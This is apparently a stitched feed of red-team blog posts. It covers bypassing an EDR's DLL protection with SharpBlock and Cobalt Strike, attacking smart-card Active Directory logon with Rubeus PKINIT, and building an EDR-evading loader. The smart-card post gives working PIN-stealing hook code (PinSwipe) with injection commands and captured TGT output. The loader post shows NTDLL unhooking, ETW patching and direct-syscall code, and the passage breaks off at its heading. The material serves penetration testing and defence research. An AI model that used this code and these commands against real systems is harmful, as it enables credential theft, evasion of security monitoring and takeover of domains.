SharpBlock.exe -e c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike"

The SylantStrikeInject process will then detect the launch of notepad and attempt to load the active protection DLL

SylantStrikeInject.exe -p notepad.exe -d C:\tools\SylantStrike.dll
Waiting for process events
Listening for the following processes: notepad.exe 

+ Injecting process notepad.exe(6784) with DLL C:\tools\SylantStrike.dll

But this time, SharpBlock detects the loaded DLL from the description field of SylantStrike.dll’s version info and patches the entry point

SharpBlock by @_EthicalChaos_
DLL Blocking app for child processes

[+] Launched process c:\windows\system32\notepad.exe with PID 6784
[+] Blocked DLL C:\tools\SylantStrike.dll
[+] Patching DLL Entry Point at 0x7ffd89932c74
[+] Successfully patched DLL Entry Point

Attempting to injecting our shellcode from part 1 using Cobalt Strike results in the successful launch of calc and cmd and is not blocked by SylantStrike’s active DLL protection.

shinject 6784 x64 C:\Tools\SylantStrike\loader.bin

If you are interested in giving it a go, head over to the SharpBlock project on GitHub

Acknowledgements

The post Lets Create An EDR… And Bypass It! Part 2 appeared first on Ethical Chaos.

Attacking Smart Card Based Active Directory Networks

By: CCob
4 October 2020 at 19:31

Introduction

Recently I was involved in an engagement where I was attacking smart card based Active Directory networks. The fact is though, you don’t need a physical smart card at all to authenticate to Active Directory that enforces smart card logon. The attributes of the certificate determine if it can be used for smart card based logon not the origin of the associated private key. So if you have access to the corresponding private key, smart card logon can still be achieved.

When a user has been enrolled for smart card based login, in it’s default configuration, the domain controller will accept any certificate signed by it’s trusted certificate authority that meets the following specification:

  • CRL Distribution Point must be populated, online and available
  • Key Usage for the certificate is set to Digital Signature
  • Enhanced Key Usages:
    • Smart Card Logon
    • Client Authentication (Optional, used for SSL based authentication)
  • Subject Alternative Names containing user UPN’s
  • Fully distinguished AD name of the user as the Subject

Additionally if the Allow certificates with no extended key usage certificate attribute group policy is enabled, the enhanced key usages doesn’t need to be present at all. This can lead to the abuse of other types of certificates issued to domain users or computers. Check out the post from CQURE Academy on how this policy can be abused.

Typical certificate capable of PKI/smart card login

This particularly journey of mine then began. How can we take leaked private keys or physical smart card pins and use them to our advantage.

PKINIT

As many of you are aware, modern day Active Directory uses Kerberos for authenticating to the domain. Tools like Rubeus, Mimikatz, Kekeo and impacket can be used to abuse Kerberos to the attackers advantage.

So where does PKI based authentication fit in with Kerberos? Back in 2006, a combined effort between Microsoft and the Aerospace Corporation submitted RFC 4556. This introduced public key cryptography support for Kerberos pre-authentication.

Pre-authentication is Kerberos’s answer to offline brute force attacks on an account password. Without pre-authentication enabled on an AD account, users are vulnerable to AS-REP roasting attacks. With the introduction of pre-authentication, the initial AS-REQ Kerberos request contains an encrypted timestamp. The key used to encrypt it is derived from the users password. This proves to the KDC that the user requesting the login does know the account password. Therefore, the KDC is happy to send back an encrypted AS-REP (response to AS-REQ) tied to the users password. The fact that the pre-auth data contains a timestamp also prevents replay attacks. If the pre-authenticated data is not valid, the KDC returns with an error, and no brute forcing of the AS-REP response key is possible. If an attacker is suitable placed within a network to spy on Kerberos responses though, AS-REP roasting is still possible.

PKI based authentication works in a similar fashion. It uses Kerberos pre-authentication to prove the user is who they say they are. Again, this uses a timestamp, but instead of encrypting the message with the users password derived key, it signs the message in the form of a PKCS #7 Cryptographic Message Syntax (CMS) payload using the private key belonging to the certificate. This private key can be present on a physical smart card or also be stored in other forms too, including not so secure methods. Once the KDC validates the signature of the CMS payload and everything checks out, an AS-REP is sent back to the client. One final detail of PKINIT is the encryption used for the AS-REP response. Because no password is used during a PKI based Kerberos login the user key is unknown to the client. To combat this, the AS-REP is either encrypted using a key that is obtained using the Diffie-Hellman key exchange algorithm or it is encrypted with the public key of the certificate used in the initial AS-REQ request. This initial request contains the details on which method is preferred.

From here on out, everything else remains the same. The client will have a valid TGT that can be used to request TGS tickets. The certificate is no longer used for the lifetime of the TGT and will generally remain valid for 7 days before the private key for the certificate is needed again. That’s not to say during Windows logon the private key doesn’t get used for 7 days. If the machine is locked or a user has logged out, Windows will enforce an authentication as it does with a password based login. But from an attackers perspective, this is irrelevant if they have obtained a TGT.

More in depth details on interactive and network based logon using smart cards can be found from the MS-PKCA documentation.

Rubeus with PKINIT

So I started working on adding PKINIT support to Rubeus and created a pull request. I have to give a big shout out to the Kerberos king @SteveSyfus. Kerberos.NET was a massive help when trying to understand the inner workings of PKINIT and some modified code worked it’s way into Rubeus. Also a tip of the hat to to @gentilkiwi for Kekeo/Mimikatz and @harmj0y and other Rubeus contributors. I wouldn’t have such a great tool start with in the first place if it wasn’t for their hard work.

PKCS#12 Based Authentication (PFX)

The first attack scenario I’ll cover is the exposure of a users private key. We can use a PKCS#12 certificate store which contains a users certificate along with the corresponding private key to generate a Kerberos TGT. Generating the pfx will depend on how you have managed to expose private keys in the first place. You can use OpenSSL to generate a PKCS12 store once you have the private key blob and corresponding certificate like this:

openssl pkcs12 -export -out leaked.pfx -inkey privateKey.key -in certificate.crt 

Once you have generated a valid certificate store, we can use the new addition to Rubeus to request a TGT. If you decide to protect the certificate store with a password, you can add the /password option to the command line.

Rubeus.exe asktgt /user:Administrator /certificate:leaked.pfx /domain:hacklab.local /dc:dc.hacklab.local

Rubeus will then generate a PKINIT based AS-REQ using the supplied certificate store to authenticate the user. If everything checks out and the KDC is happy you should get something similar to this:


   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v1.5.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):
      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
  ServiceName           :  krbtgt/hacklab.local
  ServiceRealm          :  HACKLAB.LOCAL
  UserName              :  Administrator
  UserRealm             :  HACKLAB.LOCAL
  StartTime             :  02/10/2020 16:01:12
  EndTime               :  03/10/2020 02:01:12
  RenewTill             :  09/10/2020 16:01:12
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  6tIiFytU5V2cgSpXt8skdw==

The resulting .kirbi Base64 encoded string can then be used for obtaining TGS’s from the KDC as normal.

Physical Smart Card Login

After I managed to get PKINIT working with a certificate store, it then got me thinking on how we could use a physical smart card too. The main obstacle to using smart cards once a compromise of a users machine occurs is of course the PIN. Without knowing the PIN we cannot generate a valid AS-REQ. Brute forcing is out of the question since 3 invalid attempts and the card will lock you out.

One option is to capture the PIN when a user is required to unlock the smart card. This could be for a machine unlock/login, website login or other services on the network that requires smart card authentication.

After a little investigation this led me to the WinSCard DLL. This DLL is the gateway to communicating with the Smard Card service. The service then controls the resources and communication with the smart cards themselves. Generally anything that communicates with the smart card on Windows will use the WinSCard API. This also includes LSASS during login and Internet Explorer / Edge browser when authenticating to websites that require smart card authentication.

The specific export from the WinSCard.dll that interested me was the SCardTransmit API. This is the API used to transmit what the smart card ISO/IEC 7816 specification calls an Application Protocol Data Unit (APDU). This is the lowest level transmission unit that is used to communicate with a smart card.

Field nameLength (bytes)Description
CLA1Instruction class – indicates the type of command, e.g. interindustry or proprietary
INS1Instruction code – indicates the specific command, e.g. “write data”
P1-P22Instruction parameters for the command, e.g. offset into file at which to write the data
Lc0, 1 or 3Encodes the number (Nc) of bytes of command data to follow0 bytes denotes Nc=0
1 byte with a value from 1 to 255 denotes Nc with the same value
3 bytes, the first of which must be 0, denotes Nc in the range 1 to 65 535 (all three bytes may not be zero)
Command dataNcNc bytes of data
Le0, 1, 2 or 3Encodes the maximum number (Ne) of response bytes expected0 bytes denotes Ne=0
1 byte in the range 1 to 255 denotes that value of Ne, or 0 denotes Ne=256
2 bytes (if extended Lc was present in the command) in the range 1 to 65 535 denotes Ne of that value, or two zero bytes denotes 65 536
3 bytes (if Lc was not present in the command), the first of which must be 0, denote Ne in the same way as two-byte Le
Response APDU
Response dataNr (at most Ne)Response data
SW1-SW2
(Response trailer)
2Command processing status, e.g. 90 00 (hexadecimal) indicates success
APDU Structure from Wikipedia

If we hook this API, then we should be able to spy on PDU’s transmitted to the card.

LONG SCardTransmit(
  SCARDHANDLE         hCard,
  LPCSCARD_IO_REQUEST pioSendPci,
  LPCBYTE             pbSendBuffer,
  DWORD               cbSendLength,
  LPSCARD_IO_REQUEST  pioRecvPci,
  LPBYTE              pbRecvBuffer,
  LPDWORD             pcbRecvLength
);

The pbSendBuffer parameter contains the APDU packet that is is making it’s way to the card and the pbRecvBuffer will contain the response from the smart card.

Whilst the ISO smart card specification has recommendations for certain command classes and command data structures, these are generally application specific and not defined by the ISO smart card specification itself. So where do we look for answers now? For identity and access purposes NIST produced the Personal Identity Verification (PIV) SP 800-73-4 specification. Without going into too much detail, the specification covers how the smart card should handle certificates enrolled onto the device along with all the APU’s to implement the specification. The area of interest within the PIV specification is section 3.2.1 VERIFY Card Command. The section describes how the VERIFY APDU is used to validate the PIN prior to allowing access to private keys stored on the card.

So armed with the information from the ISO specification along with section 3.2.1 from the PIV specification we should be able to produce a reliable hook to capture a PIN transmitted to the card. I covered API hooking in my EDR series of blog posts, so the methods used here a the same. Here is the implementation of the hooked API.

DWORD WINAPI SCardTransmit_Hooked(SCARDHANDLE hCard,
	LPCSCARD_IO_REQUEST pioSendPci,
	LPCBYTE             pbSendBuffer,
	DWORD               cbSendLength,
	LPSCARD_IO_REQUEST  pioRecvPci,
	LPBYTE              pbRecvBuffer,
	LPDWORD             pcbRecvLength) {
	
	char debugString[1024] = { 0 };
	DWORD result = pOriginalpSCardTransmit(hCard, pioRecvPci, pbSendBuffer, cbSendLength, pioRecvPci, pbRecvBuffer, pcbRecvLength);
	//Check for CLA 0, INS 0x20 (VERIFY) and P1 of 00/FF according to NIST.SP.800-73-4 (PIV) specification
	if (cbSendLength >= 13 && pbSendBuffer[0] == 0 && pbSendBuffer[1] == 0x20 && (pbSendBuffer[2] == 0 || pbSendBuffer[2] == 0xff)) {
		//Check card response status for success
		bool success = false;
		if (pbRecvBuffer[0] == 0x90 && pbRecvBuffer[1] == 0x00) {
			success = true;
		}
		char asciiPin[9];
		sprintf_s(debugString, sizeof(debugString), "Swipped VERIFY PIN: Type %s, Valid: %s, Pin: %s", GetPinType(pbSendBuffer[3]), success ? "true" : "false", 
			GetPinAsASCII(pbSendBuffer+5, min(pbSendBuffer[4],8), asciiPin));
		SendPINOverPipe(debugString);			
	}
	return result;
}

The first thing the API call does is call the original SCardTransmit function. Not only are we interested in the request we also want to know the response from the card. This way we can determine if the transmitted PIN to the card was correct too. The function then looks for the VERIFY PDU to isolate commands specific to verifying the PIN. Once we have determined a VERIFY PDU is in progress we check the result, 0x90 0x00 signifies the PIN was validated correctly. Next, we extract the PIN from the send buffer at offset 5 (Command data within the PDU structure). Finally we transmit the PIN details over a named pipe ready for capture by a receiving application interested in the data.

Packaging this functionality into a DLL that is also capable of being reflectively loaded will allow the DLL to be injected into our process of interest without hitting the disk. You can find the complete PinSwipe project on my GitHub repo which also includes a .NET PinSwipeListener console app that will list certificates found with the Smart Card Logon Enhanced Key Usage attribute then setup a listening pipe to capture swiped PIN’s.

Demo

In this assumed breach scenario I already have a Cobalt Strike beacon connected to a victim workstation. I am using an Administrator account but a limited account will work too. The PinSwipe DLL can be injected into a high privilege process like lsass when Administrative access is obtained which enables swiping PINs during login, but with limited user level access you will be restricted to injecting into user mode processes like Internet Explorer etc…

So first of all let’s launch PinSwipeListener, this will dump out certificate information for user certificates that have the Smart Card Logon EKU.

beacon> execute-assembly C:\tools\PinSwipeListener.exe
[*] Tasked beacon to run .NET program: PinSwipeListener.exe
[+] host called home, sent: 112171 bytes
[+] received output:
[+] Found smart card logon certificate with thumbprint 55C65AB0B9B6A893A6E8449FB34DD61093B231D8 and subject CN=Administrator, CN=Users, DC=hacklab, DC=loca

With the listener now in place we need to choose which processes to inject PinSwipe.dll into. Targets like Internet Explorer, Chrome etc… are good choices since these will regularly pop up requesting PIN’s in a smart card authenticated environment. For the demo I was running Internet Explorer which was running under PID 2678. I should note that IE, like Chrome, launches child processes for various tabs in use. So you’ll need to inject the correct process. Other more advanced aggressor scripts could be used that continually look out for new IE processes and inject into them all, but I will leave that as an exercise for the reader.

beacon> dllinject 2678 C:\tools\PinSwipe.dll
[*] Tasked beacon to inject C:\tools\PinSwipe.dll into 2678

Once a user enters their PIN into the dialog, PinSwipe should do its thing and capture the request and send it over the named pipe to PinSwipeListener.

IE presenting PIN dialog for end user
[+] received output:
[+] PinSwipe: Swipped VERIFY PIN: Type PIV Card Application, Valid: true, Pin: 123456

The output for PinSwipe will indicate if the entered PIN was correct in addition to the PIN number entered. Once you have captured the PIN you can use the new Rubeus feature to request a TGT using the users physical smart card. This time the /certificate parameter will reference the thumbprint or subject name of the certificate to use not a pfx file like in first demo. The output from PinSwipeListener will help when supplying this argument.

beacon> execute-assembly C:\tools\Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc:192.168.74.2 /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[*] Tasked beacon to run .NET program: Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc:192.168.74.2 /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[+] host called home, sent: 357691 bytes
[+] received output:
   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v1.5.0 
[*] Action: Ask TGT
[+] received output:
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] received output:
[+] TGT request successful!
[+] received output:
[*] base64(ticket.kirbi):
      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
  ServiceName           :  krbtgt/hacklab.local
  ServiceRealm          :  HACKLAB.LOCAL
  UserName              :  Administrator
  UserRealm             :  HACKLAB.LOCAL
  StartTime             :  04/10/2020 19:55:29
  EndTime               :  05/10/2020 05:55:29
  RenewTill             :  11/10/2020 19:55:29
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  5K2V8xIaGbUS8ZYqTl120Q==

That is it. You now have a TGT that can be used for 7 days for requesting new TGS tickets for accessing other network resources.

Final Notes

When using physical smart cards within your network it’s always a good idea to have cards that require a physical press of a button or better still a biometric reader. That way, any compromise of a users account will not lead to generating TGT’s since the smart card will prevent access to the private keys without the physical press of a button or biometric data being present.

References

The post Attacking Smart Card Based Active Directory Networks appeared first on Ethical Chaos.

Creating an OPSEC safe loader for Red Team Operations

29 November 2023 at 09:00

As Red Teamers, we need an OPSEC safe method to execute shellcode via a range of initial access vectors. Things are getting more and more difficult with Endpoint Detection and Response (EDR) products improving, making it more challenging to get an implant.

This post is going to present a slightly new method for bypassing EDR, commonly known as CreateThreadPoolWait. However, instead of using kernel32.dll we will use ntdll.dll.

github GitHub: https://github.com/nettitude/Tartarus-TpAllocInject

The loader published above uses the the bypass technique introduced within this article.

We as Red Teamers need to consider what detection mechanisms EDR solutions are using, in order to create an effective loader for evasion. A few of the main options that EDR have at their disposal to obtain telemetry are:

  • User mode hooking against multiple APIs
  • EtwTi for telemetry against specific actions like allocations on executable pages, etc…
  • ETW / AMSI event telemetry
  • Kernel Callbacks
  • Minifilter driver

Let’s review some of the choices often used by loaders.

  • Bad OPSEC #1 – Strings that hint to malicious actions
  • Bad OPSEC #2 – Unhooking
  • Bad OPSEC #3 – Private bytes (Patching)
  • Bad OPSEC #4 – Hell’s Gate

Some of the above are going to be addressed below, whilst others are left as an exercise for the reader.

Bad OPSEC #1 – Strings

There are multiple ways to approach hiding strings in binaries. In general, the most common reasons for strings within malicious binaries are DLL loading and resolving their exported functions.

We’re not going to focus too much on this issue here, but often strings can be obfuscated through encoding or encryption. Another method used more and more recently is hashing the strings and comparing them in real time – ideal for API resolving and DLL loading.

Bad OPSEC #2 – Unhooking

This is a huge subject to go into; avoiding user space hooks by EDRs.

It is worth mentioning that Microsoft is not a fan of EDR companies hooking all these functions since there are other ways to approach obtaining telemetry, rather than performing shady hooks in DLLs. Some of the more effective and advanced EDRs do not hook any DLLs, such as Microsoft Defender for Endpoint or Elastic.

Let’s try to see which techniques are most common for threat actors to use and why they could be better; there are multiple projects available online where loaders use the unhooking method of loading a second NTDLL (which is an IOC by itself) – changing the protection of the main NTDLL to RWX via VirtualProtect, replacing the hooked section of the main NTDLL from the second one, and then again using VirtualProtect to restore the original permissions.

There are unfortunately many IOCs in the method explained above, and in addition to this, a lot of code reviewed was found to have copied the below code for unhooking.

GetModuleInformation(process, ntdllModule, &mi, sizeof(mi));
LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
    PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
    
    if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
        DWORD oldProtection = 0;
        bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
        memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
        isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
    }
}

CloseHandle(process);
CloseHandle(ntdllFile);
CloseHandle(ntdllMapping);
FreeLibrary(ntdllModule);

Most people, however, do not realize that there is a mistake at the end of the code and CloseHandle(ntdllMapping) does not remove the second NTDLL loaded.

The use of FreeLibrary is also a mistake, since it tries to free the main NTDLL which is not possible due to the way Windows processes work. Effectively, the process will have loaded two copies of NTDLL, which in the eyes of an experienced threat hunter or an EDR solution, is most likely a hint to a malicious process.

Bad OPSEC #3 – Private bytes (Patching)

“Private bytes” IOCs usually exist when the loader tries to unhook a DLL, as is the case in the previous example at the stage where a section of NTDLL is copied from the second version and loaded into the first.

There are other instances where threat actors perform patching, like in this case against ETW and AMSI patching. The method is similar to the NTDLL unhooking but instead of replacing a whole section, threat actors do the same thing EDRs do – they insert a set of instructions in the beginning of the AMSI or ETW function in order to return (exit) from the function.

In the below code, which consists of patching AMSI’s exported function, AmsiScanBuffer, it is clear that the exact same IOCs exist as in the previous situation.

void patchETW(OUT HANDLE& hProc) {

    void* etwAddr = GetProcAddress(GetModuleHandle(L"ntdll.dll"), "EtwEventWrite");
    
    char etwPatch[] = { 0xC3 };
    
    DWORD lpflOldProtect = 0;
    unsigned __int64 memPage = 0x1000;
    void* etwAddr_bk = etwAddr;
    NtProtectVirtualMemory(hProc, (PVOID*)&etwAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
    NtWriteVirtualMemory(hProc, (LPVOID)etwAddr, (PVOID)etwPatch, sizeof(etwPatch), (SIZE_T*)nullptr);
    NtProtectVirtualMemory(hProc, (PVOID*)&etwAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
    std::cout << "[+] Patched etw!\n";

}

There are two VirtualProtect and private bytes IOCs, however, there is a way around this method by using HWBP (Hardware Breakpoint) hooking against those functions. This method works by hooking the function, and at the time the function is called, it replaces the behaviour with a different one – such as exiting the function of AmsiScanBuffer.

A public proof-of-concept for this method can be found here.

Bad OPSEC #4 – Hell’s Gate Direct Syscalls

Hell’s Gate is an excellent technique of manually going through NTDLL, finding the syscall IDs, and creating a stub which calls the syscall from our process.

Originally when this technique was released it was great – EDR solutions were not hooking – but given that these days a number of products hook offsets, the calculations can fail. Due to this, the technique was developed further with an update called Halo’s Gate, tackling this issue by performing some extra calculations in NTDLL’s memory to find the syscall ID.

There was one further update called Tartarus’ Gate – released because Halo’s Gate was not handling a hooking method of a specific EDR. This is a great method of avoiding unhooking IOCs, since for all of the above there is no need for any API such as VirtualProtect or WriteProcessMemory to be used. However, one IOC still exists, which is Direct Syscalls.

This is what the stub looks like:

HellDescent PROC
    mov r10, rcx
    mov eax, wSystemCall

    syscall
    ret
HellDescent ENDP

This is an IOC that occurs because the call of syscall comes directly from the loader’s memory space and not the loaded NTDLL, which is easy to detect if a stack trace is reviewed.

The loader presented below will tackle this issue, as well as performing indirect syscall method which replaces the instruction of syscall in the stub with a JMP instruction to a valid syscall instruction in the NTDLL.

Creating the Loader

